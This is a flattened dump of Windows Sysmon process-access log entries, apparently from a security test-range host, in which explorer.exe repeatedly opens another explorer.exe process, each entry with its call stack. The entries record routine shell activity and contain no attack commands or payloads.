16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 